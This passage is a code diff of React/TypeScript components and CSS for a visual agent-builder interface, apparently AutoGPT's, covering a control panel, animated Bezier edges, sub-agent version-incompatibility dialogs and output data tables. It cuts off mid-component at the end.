* ControlPanel component displays a panel with controls as icons, with the ability to take in children.
* @param {Object} ControlPanelProps - The properties of the control panel component.
* @param {Array} ControlPanelProps.controls - An array of control objects representing actions to be performed.
* @param {Array} ControlPanelProps.children - The child components of the control panel.
* @param {string} ControlPanelProps.className - Additional CSS class names for the control panel.
* @returns The rendered control panel component.
*/
export const ControlPanel = ({
controls,
topChildren,
botChildren,
className,
}: ControlPanelProps) => {
return (
<Card className={cn("m-4 mt-24 w-14 dark:bg-slate-900", className)}>
<CardContent className="p-0">
<div className="flex flex-col items-center gap-3 rounded-xl py-3">
{topChildren}
<Separator className="dark:bg-slate-700" />
{controls.map((control, index) => (
<Tooltip key={index} delayDuration={500}>
<TooltipTrigger asChild>
<div>
<Button
variant="ghost"
size="icon"
onClick={() => control.onClick()}
data-id={`control-button-${index}`}
data-testid={`blocks-control-${control.label.toLowerCase()}-button`}
disabled={control.disabled || false}
className="dark:bg-slate-900 dark:text-slate-100 dark:hover:bg-slate-800"
>
{control.icon}
<span className="sr-only">{control.label}</span>
</Button>
</div>
</TooltipTrigger>
<TooltipContent
side="right"
className="dark:bg-slate-800 dark:text-slate-100"
>
{control.label}
</TooltipContent>
</Tooltip>
))}
<Separator className="dark:bg-slate-700" />
{botChildren}
</div>
</CardContent>
</Card>
);
};
export default ControlPanel;

View File

@@ -0,0 +1,240 @@
import React, {
useCallback,
useContext,
useEffect,
useState,
useRef,
} from "react";
import {
BaseEdge,
EdgeLabelRenderer,
EdgeProps,
useReactFlow,
XYPosition,
Edge,
Node,
} from "@xyflow/react";
import "./customedge.css";
import { X } from "lucide-react";
import { BuilderContext } from "../Flow/Flow";
import { NodeExecutionResult } from "@/lib/autogpt-server-api";
import { useCustomEdge } from "./useCustomEdge";
export type CustomEdgeData = {
edgeColor: string;
sourcePos?: XYPosition;
isStatic?: boolean;
beadUp: number;
beadDown: number;
beadData?: Map<string, NodeExecutionResult["status"]>;
};
type Bead = {
t: number;
targetT: number;
startTime: number;
};
export type CustomEdge = Edge<CustomEdgeData, "custom">;
export function CustomEdge({
id,
data,
selected,
sourceX,
sourceY,
targetX,
targetY,
markerEnd,
}: EdgeProps<CustomEdge>) {
const [beads, setBeads] = useState<{
beads: Bead[];
created: number;
destroyed: number;
}>({ beads: [], created: 0, destroyed: 0 });
const beadsRef = useRef(beads);
const { svgPath, length, getPointForT, getTForDistance } = useCustomEdge(
sourceX - 5,
sourceY - 5,
targetX + 3,
targetY - 5,
);
const { deleteElements } = useReactFlow<Node, CustomEdge>();
const builderContext = useContext(BuilderContext);
const { visualizeBeads } = builderContext ?? {
visualizeBeads: "no",
};
// Check if this edge is broken (during resolution mode)
const isBroken =
builderContext?.resolutionMode?.active &&
builderContext?.resolutionMode?.brokenEdgeIds?.includes(id);
const onEdgeRemoveClick = () => {
deleteElements({ edges: [{ id }] });
};
const animationDuration = 500; // Duration in milliseconds for bead to travel the curve
const beadDiameter = 12;
const deltaTime = 16;
const setTargetPositions = useCallback(
(beads: Bead[]) => {
const distanceBetween = Math.min(
(length - beadDiameter) / (beads.length + 1),
beadDiameter,
);
return beads.map((bead, index) => {
const distanceFromEnd = beadDiameter * 1.35;
const targetPosition = distanceBetween * index + distanceFromEnd;
const t = getTForDistance(-targetPosition);
return {
...bead,
t: visualizeBeads === "animate" ? bead.t : t,
targetT: t,
} as Bead;
});
},
[getTForDistance, length, visualizeBeads],
);
beadsRef.current = beads;
useEffect(() => {
const beadUp: number = data?.beadUp ?? 0;
const beadDown: number = data?.beadDown ?? 0;
if (
beadUp === 0 &&
beadDown === 0 &&
(beads.created > 0 || beads.destroyed > 0)
) {
setBeads({ beads: [], created: 0, destroyed: 0 });
return;
}
// Add beads
if (beadUp > beads.created) {
setBeads(({ beads, created, destroyed }) => {
const newBeads = [];
for (let i = 0; i < beadUp - created; i++) {
newBeads.push({ t: 0, targetT: 0, startTime: Date.now() });
}
const b = setTargetPositions([...beads, ...newBeads]);
return { beads: b, created: beadUp, destroyed };
});
}
// Animate and remove beads
const interval = setInterval(
({ current: beads }) => {
// If there are no beads visible or moving, stop re-rendering
if (
(beadUp === beads.created && beads.created === beads.destroyed) ||
beads.beads.every((bead) => bead.t >= bead.targetT)
) {
clearInterval(interval);
return;
}
setBeads(({ beads, created, destroyed }) => {
let destroyedCount = 0;
const newBeads = beads
.map((bead) => {
const progressIncrement = deltaTime / animationDuration;
const t = Math.min(
bead.t + bead.targetT * progressIncrement,
bead.targetT,
);
return { ...bead, t };
})
.filter((bead, index) => {
const removeCount = beadDown - destroyed;
if (bead.t >= bead.targetT && index < removeCount) {
destroyedCount++;
return false;
}
return true;
});
return {
beads: setTargetPositions(newBeads),
created,
destroyed: destroyed + destroyedCount,
};
});
},
deltaTime,
beadsRef,
);
return () => clearInterval(interval);
}, [data?.beadUp, data?.beadDown, setTargetPositions, visualizeBeads]);
const middle = getPointForT(0.5);
// Determine edge color - red for broken edges
const baseColor = data?.edgeColor ?? "#555555";
const edgeColor = isBroken ? "#ef4444" : baseColor;
// Add opacity to hex color (99 = 60% opacity, 80 = 50% opacity)
const strokeColor = isBroken
? `${edgeColor}99`
: selected
? edgeColor
: `${edgeColor}80`;
return (
<>
<BaseEdge
path={svgPath}
markerEnd={markerEnd}
style={{
stroke: strokeColor,
strokeWidth: data?.isStatic ? 2.5 : 2,
strokeDasharray: data?.isStatic ? "5 3" : undefined,
}}
className="data-sentry-unmask transition-all duration-200"
/>
<path
d={svgPath}
fill="none"
strokeOpacity={0}
strokeWidth={20}
className="data-sentry-unmask react-flow__edge-interaction"
/>
<EdgeLabelRenderer>
<div
style={{
position: "absolute",
transform: `translate(-50%, -50%) translate(${middle.x}px,${middle.y}px)`,
pointerEvents: "all",
}}
className="edge-label-renderer"
>
<button
className="edge-label-button opacity-0 transition-opacity duration-200 hover:opacity-100"
onClick={onEdgeRemoveClick}
>
<X className="size-4" />
</button>
</div>
</EdgeLabelRenderer>
{beads.beads.map((bead, index) => {
const pos = getPointForT(bead.t);
return (
<circle
key={index}
cx={pos.x}
cy={pos.y}
r={beadDiameter / 2} // Bead radius
fill={data?.edgeColor ?? "#555555"}
/>
);
})}
</>
);
}

View File

@@ -0,0 +1,48 @@
.edge-label-renderer {
position: absolute;
pointer-events: all;
}
.edge-label-button {
width: 20px;
height: 20px;
background: #eee;
border: 1px solid #fff;
cursor: pointer;
border-radius: 50%;
display: flex;
justify-content: center;
align-items: center;
padding: 0;
color: #555;
opacity: 0;
transition:
opacity 0.2s ease-in-out,
background-color 0.2s ease-in-out;
}
.edge-label-button.visible {
opacity: 1;
}
.edge-label-button:hover {
box-shadow: 0 0 6px 2px rgba(0, 0, 0, 0.08);
background: #f0f0f0;
}
.edge-label-button svg {
width: 14px;
height: 14px;
}
.react-flow__edge-interaction {
cursor: pointer;
}
.react-flow__edges > svg:has(> g.selected) {
z-index: 10 !important;
}
.react-flow__edgelabel-renderer {
z-index: 11 !important;
}

View File

@@ -0,0 +1,157 @@
import { useCallback, useMemo } from "react";
type XYPosition = {
x: number;
y: number;
};
export type BezierPath = {
sourcePosition: XYPosition;
control1: XYPosition;
control2: XYPosition;
targetPosition: XYPosition;
};
export function useCustomEdge(
sourceX: number,
sourceY: number,
targetX: number,
targetY: number,
) {
const path: BezierPath = useMemo(() => {
const xDifference = Math.abs(sourceX - targetX);
const yDifference = Math.abs(sourceY - targetY);
const xControlDistance =
sourceX < targetX ? 64 : Math.max(xDifference / 2, 64);
const yControlDistance = yDifference < 128 && sourceX > targetX ? -64 : 0;
return {
sourcePosition: { x: sourceX, y: sourceY },
control1: {
x: sourceX + xControlDistance,
y: sourceY + yControlDistance,
},
control2: {
x: targetX - xControlDistance,
y: targetY + yControlDistance,
},
targetPosition: { x: targetX, y: targetY },
};
}, [sourceX, sourceY, targetX, targetY]);
const svgPath = useMemo(
() =>
`M ${path.sourcePosition.x} ${path.sourcePosition.y} ` +
`C ${path.control1.x} ${path.control1.y} ${path.control2.x} ${path.control2.y} ` +
`${path.targetPosition.x}, ${path.targetPosition.y}`,
[path],
);
const getPointForT = useCallback(
(t: number) => {
// Bezier formula: (1-t)^3 * p0 + 3*(1-t)^2*t*p1 + 3*(1-t)*t^2*p2 + t^3*p3
const x =
Math.pow(1 - t, 3) * path.sourcePosition.x +
3 * Math.pow(1 - t, 2) * t * path.control1.x +
3 * (1 - t) * Math.pow(t, 2) * path.control2.x +
Math.pow(t, 3) * path.targetPosition.x;
const y =
Math.pow(1 - t, 3) * path.sourcePosition.y +
3 * Math.pow(1 - t, 2) * t * path.control1.y +
3 * (1 - t) * Math.pow(t, 2) * path.control2.y +
Math.pow(t, 3) * path.targetPosition.y;
return { x, y };
},
[path],
);
const getArcLength = useCallback(
(t: number, samples: number = 100) => {
let length = 0;
let prevPoint = getPointForT(0);
for (let i = 1; i <= samples; i++) {
const currT = (i / samples) * t;
const currPoint = getPointForT(currT);
length += Math.sqrt(
Math.pow(currPoint.x - prevPoint.x, 2) +
Math.pow(currPoint.y - prevPoint.y, 2),
);
prevPoint = currPoint;
}
return length;
},
[getPointForT],
);
const length = useMemo(() => {
return getArcLength(1);
}, [getArcLength]);
const getBezierDerivative = useCallback(
(t: number) => {
const mt = 1 - t;
const x =
3 *
(mt * mt * (path.control1.x - path.sourcePosition.x) +
2 * mt * t * (path.control2.x - path.control1.x) +
t * t * (path.targetPosition.x - path.control2.x));
const y =
3 *
(mt * mt * (path.control1.y - path.sourcePosition.y) +
2 * mt * t * (path.control2.y - path.control1.y) +
t * t * (path.targetPosition.y - path.control2.y));
return { x, y };
},
[path],
);
const getTForDistance = useCallback(
(distance: number, epsilon: number = 0.0001) => {
if (distance < 0) {
distance = length + distance; // If distance is negative, calculate from the end of the curve
}
let t = distance / getArcLength(1);
let prevT = 0;
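// Newton-Raphson on f(t) = arcLength(t) - distance, with f'(t) = |B'(t)| (speed along the curve).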
while (Math.abs(t - prevT) > epsilon) {
prevT = t;
const length = getArcLength(t);
const derivative = Math.sqrt(
Math.pow(getBezierDerivative(t).x, 2) +
Math.pow(getBezierDerivative(t).y, 2),
);
t -= (length - distance) / derivative;
t = Math.max(0, Math.min(1, t)); // Clamp t between 0 and 1
}
return t;
},
[getArcLength, getBezierDerivative, length],
);
const getPointAtDistance = useCallback(
(distance: number) => {
if (distance < 0) {
distance = length + distance; // If distance is negative, calculate from the end of the curve
}
const t = getTForDistance(distance);
return getPointForT(t);
},
[getTForDistance, getPointForT, length],
);
return {
path,
svgPath,
length,
getPointForT,
getTForDistance,
getPointAtDistance,
};
}

View File

@@ -0,0 +1,244 @@
import React from "react";
import {
Dialog,
DialogContent,
DialogDescription,
DialogFooter,
DialogHeader,
DialogTitle,
} from "@/components/__legacy__/ui/dialog";
import { Button } from "@/components/__legacy__/ui/button";
import { AlertTriangle, XCircle, PlusCircle } from "lucide-react";
import { IncompatibilityInfo } from "../../../hooks/useSubAgentUpdate/types";
import { beautifyString } from "@/lib/utils";
import { Alert, AlertDescription } from "@/components/molecules/Alert/Alert";
interface IncompatibilityDialogProps {
isOpen: boolean;
onClose: () => void;
onConfirm: () => void;
currentVersion: number;
latestVersion: number;
agentName: string;
incompatibilities: IncompatibilityInfo;
}
export const IncompatibilityDialog: React.FC<IncompatibilityDialogProps> = ({
isOpen,
onClose,
onConfirm,
currentVersion,
latestVersion,
agentName,
incompatibilities,
}) => {
const hasMissingInputs = incompatibilities.missingInputs.length > 0;
const hasMissingOutputs = incompatibilities.missingOutputs.length > 0;
const hasNewInputs = incompatibilities.newInputs.length > 0;
const hasNewOutputs = incompatibilities.newOutputs.length > 0;
const hasNewRequired = incompatibilities.newRequiredInputs.length > 0;
const hasTypeMismatches = incompatibilities.inputTypeMismatches.length > 0;
const hasInputChanges = hasMissingInputs || hasNewInputs;
const hasOutputChanges = hasMissingOutputs || hasNewOutputs;
return (
<Dialog open={isOpen} onOpenChange={(open) => !open && onClose()}>
<DialogContent className="max-w-lg">
<DialogHeader>
<DialogTitle className="flex items-center gap-2">
<AlertTriangle className="h-5 w-5 text-amber-500" />
Incompatible Update
</DialogTitle>
<DialogDescription>
Updating <strong>{beautifyString(agentName)}</strong> from v
{currentVersion} to v{latestVersion} will break some connections.
</DialogDescription>
</DialogHeader>
<div className="space-y-4 py-2">
{/* Input changes - two column layout */}
{hasInputChanges && (
<TwoColumnSection
title="Input Changes"
leftIcon={<XCircle className="h-4 w-4 text-red-500" />}
leftTitle="Removed"
leftItems={incompatibilities.missingInputs}
rightIcon={<PlusCircle className="h-4 w-4 text-green-500" />}
rightTitle="Added"
rightItems={incompatibilities.newInputs}
/>
)}
{/* Output changes - two column layout */}
{hasOutputChanges && (
<TwoColumnSection
title="Output Changes"
leftIcon={<XCircle className="h-4 w-4 text-red-500" />}
leftTitle="Removed"
leftItems={incompatibilities.missingOutputs}
rightIcon={<PlusCircle className="h-4 w-4 text-green-500" />}
rightTitle="Added"
rightItems={incompatibilities.newOutputs}
/>
)}
{hasTypeMismatches && (
<SingleColumnSection
icon={<XCircle className="h-4 w-4 text-red-500" />}
title="Type Changed"
description="These connected inputs have a different type:"
items={incompatibilities.inputTypeMismatches.map(
(m) => `${m.name} (${m.oldType} → ${m.newType})`,
)}
/>
)}
{hasNewRequired && (
<SingleColumnSection
icon={<PlusCircle className="h-4 w-4 text-amber-500" />}
title="New Required Inputs"
description="These inputs are now required:"
items={incompatibilities.newRequiredInputs}
/>
)}
</div>
<Alert variant="warning">
<AlertDescription>
If you proceed, you&apos;ll need to remove the broken connections
before you can save or run your agent.
</AlertDescription>
</Alert>
<DialogFooter className="gap-2 sm:gap-0">
<Button variant="outline" onClick={onClose}>
Cancel
</Button>
<Button
variant="destructive"
onClick={onConfirm}
className="bg-amber-600 hover:bg-amber-700"
>
Update Anyway
</Button>
</DialogFooter>
</DialogContent>
</Dialog>
);
};
interface TwoColumnSectionProps {
title: string;
leftIcon: React.ReactNode;
leftTitle: string;
leftItems: string[];
rightIcon: React.ReactNode;
rightTitle: string;
rightItems: string[];
}
const TwoColumnSection: React.FC<TwoColumnSectionProps> = ({
title,
leftIcon,
leftTitle,
leftItems,
rightIcon,
rightTitle,
rightItems,
}) => (
<div className="rounded-md border border-gray-200 p-3 dark:border-gray-700">
<span className="font-medium">{title}</span>
<div className="mt-2 grid grid-cols-2 items-start gap-4">
{/* Left column - Breaking changes */}
<div className="min-w-0">
<div className="flex items-center gap-1.5 text-sm text-gray-500 dark:text-gray-400">
{leftIcon}
<span>{leftTitle}</span>
</div>
<ul className="mt-1.5 space-y-1">
{leftItems.length > 0 ? (
leftItems.map((item) => (
<li
key={item}
className="text-sm text-gray-700 dark:text-gray-300"
>
<code className="rounded bg-red-50 px-1 py-0.5 font-mono text-xs text-red-700 dark:bg-red-900/30 dark:text-red-300">
{item}
</code>
</li>
))
) : (
<li className="text-sm italic text-gray-400 dark:text-gray-500">
None
</li>
)}
</ul>
</div>
{/* Right column - Possible solutions */}
<div className="min-w-0">
<div className="flex items-center gap-1.5 text-sm text-gray-500 dark:text-gray-400">
{rightIcon}
<span>{rightTitle}</span>
</div>
<ul className="mt-1.5 space-y-1">
{rightItems.length > 0 ? (
rightItems.map((item) => (
<li
key={item}
className="text-sm text-gray-700 dark:text-gray-300"
>
<code className="rounded bg-green-50 px-1 py-0.5 font-mono text-xs text-green-700 dark:bg-green-900/30 dark:text-green-300">
{item}
</code>
</li>
))
) : (
<li className="text-sm italic text-gray-400 dark:text-gray-500">
None
</li>
)}
</ul>
</div>
</div>
</div>
);
interface SingleColumnSectionProps {
icon: React.ReactNode;
title: string;
description: string;
items: string[];
}
const SingleColumnSection: React.FC<SingleColumnSectionProps> = ({
icon,
title,
description,
items,
}) => (
<div className="rounded-md border border-gray-200 p-3 dark:border-gray-700">
<div className="flex items-center gap-2">
{icon}
<span className="font-medium">{title}</span>
</div>
<p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
{description}
</p>
<ul className="mt-2 space-y-1">
{items.map((item) => (
<li
key={item}
className="ml-4 list-disc text-sm text-gray-700 dark:text-gray-300"
>
<code className="rounded bg-gray-100 px-1 py-0.5 font-mono text-xs dark:bg-gray-800">
{item}
</code>
</li>
))}
</ul>
</div>
);
export default IncompatibilityDialog;

View File

@@ -0,0 +1,130 @@
import React from "react";
import { Button } from "@/components/__legacy__/ui/button";
import { ArrowUp, AlertTriangle, Info } from "lucide-react";
import {
Tooltip,
TooltipContent,
TooltipTrigger,
} from "@/components/atoms/Tooltip/BaseTooltip";
import { IncompatibilityInfo } from "../../../hooks/useSubAgentUpdate/types";
import { cn } from "@/lib/utils";
interface SubAgentUpdateBarProps {
currentVersion: number;
latestVersion: number;
isCompatible: boolean;
incompatibilities: IncompatibilityInfo | null;
onUpdate: () => void;
isInResolutionMode?: boolean;
}
export const SubAgentUpdateBar: React.FC<SubAgentUpdateBarProps> = ({
currentVersion,
latestVersion,
isCompatible,
incompatibilities,
onUpdate,
isInResolutionMode = false,
}) => {
if (isInResolutionMode) {
return <ResolutionModeBar incompatibilities={incompatibilities} />;
}
return (
<div className="flex items-center justify-between gap-2 rounded-t-lg bg-blue-50 px-3 py-2 dark:bg-blue-900/30">
<div className="flex items-center gap-2">
<ArrowUp className="h-4 w-4 text-blue-600 dark:text-blue-400" />
<span className="text-sm text-blue-700 dark:text-blue-300">
Update available (v{currentVersion} → v{latestVersion})
</span>
{!isCompatible && (
<Tooltip>
<TooltipTrigger asChild>
<AlertTriangle className="h-4 w-4 text-amber-500" />
</TooltipTrigger>
<TooltipContent className="max-w-xs">
<p className="font-medium">Incompatible changes detected</p>
<p className="text-xs text-gray-400">
Click Update to see details
</p>
</TooltipContent>
</Tooltip>
)}
</div>
<Button
size="sm"
variant={isCompatible ? "default" : "outline"}
onClick={onUpdate}
className={cn(
"h-7 text-xs",
!isCompatible && "border-amber-500 text-amber-600 hover:bg-amber-50",
)}
>
Update
</Button>
</div>
);
};
interface ResolutionModeBarProps {
incompatibilities: IncompatibilityInfo | null;
}
const ResolutionModeBar: React.FC<ResolutionModeBarProps> = ({
incompatibilities,
}) => {
const formatIncompatibilities = () => {
if (!incompatibilities) return "No incompatibilities";
const items: string[] = [];
if (incompatibilities.missingInputs.length > 0) {
items.push(
`Missing inputs: ${incompatibilities.missingInputs.join(", ")}`,
);
}
if (incompatibilities.missingOutputs.length > 0) {
items.push(
`Missing outputs: ${incompatibilities.missingOutputs.join(", ")}`,
);
}
if (incompatibilities.newRequiredInputs.length > 0) {
items.push(
`New required inputs: ${incompatibilities.newRequiredInputs.join(", ")}`,
);
}
if (incompatibilities.inputTypeMismatches.length > 0) {
const mismatches = incompatibilities.inputTypeMismatches
.map((m) => `${m.name} (${m.oldType} → ${m.newType})`)
.join(", ");
items.push(`Type changed: ${mismatches}`);
}
return items.join("\n");
};
return (
<div className="flex items-center justify-between gap-2 rounded-t-lg bg-amber-50 px-3 py-2 dark:bg-amber-900/30">
<div className="flex items-center gap-2">
<AlertTriangle className="h-4 w-4 text-amber-600 dark:text-amber-400" />
<span className="text-sm text-amber-700 dark:text-amber-300">
Remove incompatible connections
</span>
<Tooltip>
<TooltipTrigger asChild>
<Info className="h-4 w-4 cursor-help text-amber-500" />
</TooltipTrigger>
<TooltipContent className="max-w-sm whitespace-pre-line">
<p className="font-medium">Incompatible changes:</p>
<p className="mt-1 text-xs">{formatIncompatibilities()}</p>
<p className="mt-2 text-xs text-gray-400">
Delete the red connections to continue
</p>
</TooltipContent>
</Tooltip>
</div>
</div>
);
};
export default SubAgentUpdateBar;

View File

@@ -0,0 +1,131 @@
.custom-node {
color: #000000;
box-sizing: border-box;
transition: border-color 0.3s ease-in-out;
}
.custom-node .custom-switch {
padding: 0.5rem 1.25rem;
display: flex;
align-items: center;
justify-content: space-between;
}
.error-message {
color: #d9534f;
font-size: 13px;
padding-left: 0.5rem;
}
/* Existing styles */
.handle-container {
display: flex;
position: relative;
margin-bottom: 0px;
padding: 5px;
min-height: 44px;
height: 100%;
}
.react-flow__handle {
background: transparent;
width: auto;
height: auto;
border: 0;
position: relative;
transform: none;
}
.border-error {
border: 1px solid #d9534f;
}
.select-input {
width: 100%;
padding: 5px;
border-radius: 4px;
border: 1px solid #000;
background: #fff;
color: #000;
}
.radio-label {
display: block;
margin: 5px 0;
color: #000;
}
.number-input {
width: 100%;
padding: 5px;
border-radius: 4px;
background: #fff;
color: #000;
}
.array-item-container {
display: flex;
align-items: center;
margin-bottom: 5px;
}
.array-item-input {
flex-grow: 1;
padding: 5px;
border-radius: 4px;
border: 1px solid #000;
background: #fff;
color: #000;
}
.array-item-remove {
background: #d9534f;
border: none;
color: white;
cursor: pointer;
margin-left: 5px;
border-radius: 4px;
padding: 5px 10px;
}
.array-item-add {
background: #5bc0de;
border: none;
color: white;
cursor: pointer;
border-radius: 4px;
padding: 5px 10px;
margin-top: 5px;
}
.error-message {
color: #d9534f;
font-size: 13px;
margin-top: 5px;
margin-left: 5px;
}
/* Styles for node states */
.completed {
border-color: #27ae60; /* Green border for completed nodes */
}
.running {
border-color: #f39c12; /* Orange border for running nodes */
}
.failed {
border-color: #c0392b; /* Red border for failed nodes */
}
.incomplete {
border-color: #9f14ab; /* Purple border for incomplete nodes */
}
.queued {
border-color: #25e6e6; /* Cyan border for queued nodes */
}
.custom-switch {
padding-left: 2px;
}

View File

@@ -0,0 +1,166 @@
import { beautifyString } from "@/lib/utils";
import { Clipboard, Maximize2 } from "lucide-react";
import React, { useMemo, useState } from "react";
import { Button } from "../../../../../components/__legacy__/ui/button";
import { ContentRenderer } from "../../../../../components/__legacy__/ui/render";
import {
Table,
TableBody,
TableCell,
TableHead,
TableHeader,
TableRow,
} from "../../../../../components/__legacy__/ui/table";
import type { OutputMetadata } from "@/components/contextual/OutputRenderers";
import {
globalRegistry,
OutputItem,
} from "@/components/contextual/OutputRenderers";
import { Flag, useGetFlag } from "@/services/feature-flags/use-get-flag";
import { useToast } from "../../../../../components/molecules/Toast/use-toast";
import ExpandableOutputDialog from "./ExpandableOutputDialog";
type DataTableProps = {
title?: string;
truncateLongData?: boolean;
data: { [key: string]: Array<any> };
};
export default function DataTable({
title,
truncateLongData,
data,
}: DataTableProps) {
const { toast } = useToast();
const enableEnhancedOutputHandling = useGetFlag(
Flag.ENABLE_ENHANCED_OUTPUT_HANDLING,
);
const [expandedDialog, setExpandedDialog] = useState<{
isOpen: boolean;
execId: string;
pinName: string;
data: any[];
} | null>(null);
// Prepare renderers for each item when enhanced mode is enabled
const getItemRenderer = useMemo(() => {
if (!enableEnhancedOutputHandling) return null;
return (item: unknown) => {
const metadata: OutputMetadata = {};
return globalRegistry.getRenderer(item, metadata);
};
}, [enableEnhancedOutputHandling]);
const copyData = (pin: string, data: string) => {
navigator.clipboard.writeText(data).then(() => {
toast({
title: `"${pin}" data copied to clipboard!`,
duration: 2000,
});
});
};
const openExpandedView = (pinName: string, pinData: any[]) => {
setExpandedDialog({
isOpen: true,
execId: title || "Unknown Execution",
pinName,
data: pinData,
});
};
const closeExpandedView = () => {
setExpandedDialog(null);
};
return (
<>
{title && <strong className="mt-2 flex justify-center">{title}</strong>}
<Table className="cursor-default select-text">
<TableHeader>
<TableRow>
<TableHead>Pin</TableHead>
<TableHead>Data</TableHead>
</TableRow>
</TableHeader>
<TableBody>
{Object.entries(data).map(([key, value]) => (
<TableRow className="group" key={key}>
<TableCell className="cursor-text">
{beautifyString(key)}
</TableCell>
<TableCell className="cursor-text">
<div className="flex min-h-9 items-center whitespace-pre-wrap">
<div className="absolute right-1 top-auto m-1 hidden gap-1 group-hover:flex">
<Button
variant="outline"
size="icon"
onClick={() => openExpandedView(key, value)}
title="Expand Full View"
>
<Maximize2 size={18} />
</Button>
<Button
variant="outline"
size="icon"
onClick={() =>
copyData(
beautifyString(key),
value
.map((i) =>
typeof i === "object"
? JSON.stringify(i, null, 2)
: String(i),
)
.join(", "),
)
}
title="Copy Data"
>
<Clipboard size={18} />
</Button>
</div>
{value.map((item, index) => {
const renderer = getItemRenderer?.(item);
if (enableEnhancedOutputHandling && renderer) {
const metadata: OutputMetadata = {};
return (
<React.Fragment key={index}>
<OutputItem
value={item}
metadata={metadata}
renderer={renderer}
/>
{index < value.length - 1 && ", "}
</React.Fragment>
);
}
return (
<React.Fragment key={index}>
<ContentRenderer
value={item}
truncateLongData={truncateLongData}
/>
{index < value.length - 1 && ", "}
</React.Fragment>
);
})}
</div>
</TableCell>
</TableRow>
))}
</TableBody>
</Table>
{expandedDialog && (
<ExpandableOutputDialog
isOpen={expandedDialog.isOpen}
onClose={closeExpandedView}
execId={expandedDialog.execId}
pinName={expandedDialog.pinName}
data={expandedDialog.data}
/>
)}
</>
);
}

View File

@@ -0,0 +1,269 @@
import type { OutputMetadata } from "@/components/contextual/OutputRenderers";
import {
globalRegistry,
OutputActions,
OutputItem,
} from "@/components/contextual/OutputRenderers";
import { Dialog } from "@/components/molecules/Dialog/Dialog";
import { beautifyString } from "@/lib/utils";
import { Flag, useGetFlag } from "@/services/feature-flags/use-get-flag";
import { Clipboard, Maximize2 } from "lucide-react";
import React, { FC, useMemo, useState } from "react";
import { Button } from "../../../../../components/__legacy__/ui/button";
import { ContentRenderer } from "../../../../../components/__legacy__/ui/render";
import { ScrollArea } from "../../../../../components/__legacy__/ui/scroll-area";
import { Separator } from "../../../../../components/__legacy__/ui/separator";
import { Switch } from "../../../../../components/atoms/Switch/Switch";
import { useToast } from "../../../../../components/molecules/Toast/use-toast";
interface ExpandableOutputDialogProps {
isOpen: boolean;
onClose: () => void;
execId: string;
pinName: string;
data: any[];
}
const ExpandableOutputDialog: FC<ExpandableOutputDialogProps> = ({
isOpen,
onClose,
execId,
pinName,
data,
}) => {
const { toast } = useToast();
const enableEnhancedOutputHandling = useGetFlag(
Flag.ENABLE_ENHANCED_OUTPUT_HANDLING,
);
const [useEnhancedRenderer, setUseEnhancedRenderer] = useState(false);
// Prepare items for the enhanced renderer system
const outputItems = useMemo(() => {
if (!data || !useEnhancedRenderer) return [];
const items: Array<{
key: string;
label: string;
value: unknown;
metadata?: OutputMetadata;
renderer: any;
}> = [];
data.forEach((value, index) => {
const metadata: OutputMetadata = {};
// Extract metadata from the value if it's an object
if (
typeof value === "object" &&
value !== null &&
!React.isValidElement(value)
) {
const objValue = value as any;
if (objValue.type) metadata.type = objValue.type;
if (objValue.mimeType) metadata.mimeType = objValue.mimeType;
if (objValue.filename) metadata.filename = objValue.filename;
if (objValue.language) metadata.language = objValue.language;
}
const renderer = globalRegistry.getRenderer(value, metadata);
if (renderer) {
items.push({
key: `item-${index}`,
label: index === 0 ? beautifyString(pinName) : "",
value,
metadata,
renderer,
});
} else {
// Fallback to text renderer
const textRenderer = globalRegistry
.getAllRenderers()
.find((r) => r.name === "TextRenderer");
if (textRenderer) {
items.push({
key: `item-${index}`,
label: index === 0 ? beautifyString(pinName) : "",
value:
typeof value === "string"
? value
: JSON.stringify(value, null, 2),
metadata,
renderer: textRenderer,
});
}
}
});
return items;
}, [data, useEnhancedRenderer, pinName]);
const copyData = () => {
const formattedData = data
.map((item) =>
typeof item === "object" ? JSON.stringify(item, null, 2) : String(item),
)
.join("\n\n");
navigator.clipboard.writeText(formattedData).then(() => {
toast({
title: `"${beautifyString(pinName)}" data copied to clipboard!`,
duration: 2000,
});
});
};
return (
<Dialog
title={
<div className="flex items-center justify-between pr-8">
<div className="flex items-center gap-2">
<Maximize2 size={20} />
Full Output Preview
</div>
{enableEnhancedOutputHandling && (
<div className="flex items-center gap-3">
<label
htmlFor="enhanced-rendering-toggle"
className="cursor-pointer select-none text-sm font-normal text-gray-600"
>
Enhanced Rendering
</label>
<Switch
id="enhanced-rendering-toggle"
checked={useEnhancedRenderer}
onCheckedChange={setUseEnhancedRenderer}
/>
</div>
)}
</div>
}
controlled={{
isOpen,
set: (open) => {
if (!open) onClose();
},
}}
onClose={onClose}
styling={{
maxWidth: "56rem",
width: "90vw",
height: "90vh",
}}
>
<Dialog.Content>
<div className="flex h-full flex-col">
<div className="pb-4">
<p className="text-sm text-zinc-600">
Execution ID: <span className="font-mono text-xs">{execId}</span>
<br />
Pin:{" "}
<span className="font-semibold">{beautifyString(pinName)}</span>
</p>
</div>
<div className="flex flex-1 flex-col overflow-hidden">
{useEnhancedRenderer && outputItems.length > 0 && (
<div className="border-b px-4 py-2">
<OutputActions
items={outputItems.map((item) => ({
value: item.value,
metadata: item.metadata,
renderer: item.renderer,
}))}
/>
</div>
)}
<ScrollArea className="h-full">
<div className="p-4">
{data.length > 0 ? (
useEnhancedRenderer ? (
<div className="space-y-4">
{outputItems.map((item) => (
<OutputItem
key={item.key}
value={item.value}
metadata={item.metadata}
renderer={item.renderer}
label={item.label}
/>
))}
</div>
) : (
<div className="space-y-4">
{data.map((item, index) => (
<div
key={index}
className="rounded-lg border bg-gray-50 p-4"
>
<div className="mb-2 flex items-center justify-between">
<span className="text-sm font-medium text-gray-600">
Item {index + 1} of {data.length}
</span>
<Button
variant="outline"
size="sm"
onClick={() => {
const itemData =
typeof item === "object"
? JSON.stringify(item, null, 2)
: String(item);
navigator.clipboard
.writeText(itemData)
.then(() => {
toast({
title: `Item ${index + 1} copied to clipboard!`,
duration: 2000,
});
});
}}
className="flex items-center gap-1"
>
<Clipboard size={14} />
Copy Item
</Button>
</div>
<Separator className="mb-3" />
<div className="whitespace-pre-wrap break-words font-mono text-sm">
<ContentRenderer
value={item}
truncateLongData={false}
/>
</div>
</div>
))}
</div>
)
) : (
<div className="py-8 text-center text-gray-500">
No data available
</div>
)}
</div>
</ScrollArea>
</div>
<Dialog.Footer className="flex justify-between">
<div className="text-sm text-gray-600">
{data.length} item{data.length !== 1 ? "s" : ""} total
</div>
<div className="flex gap-2">
{!useEnhancedRenderer && (
<Button
variant="outline"
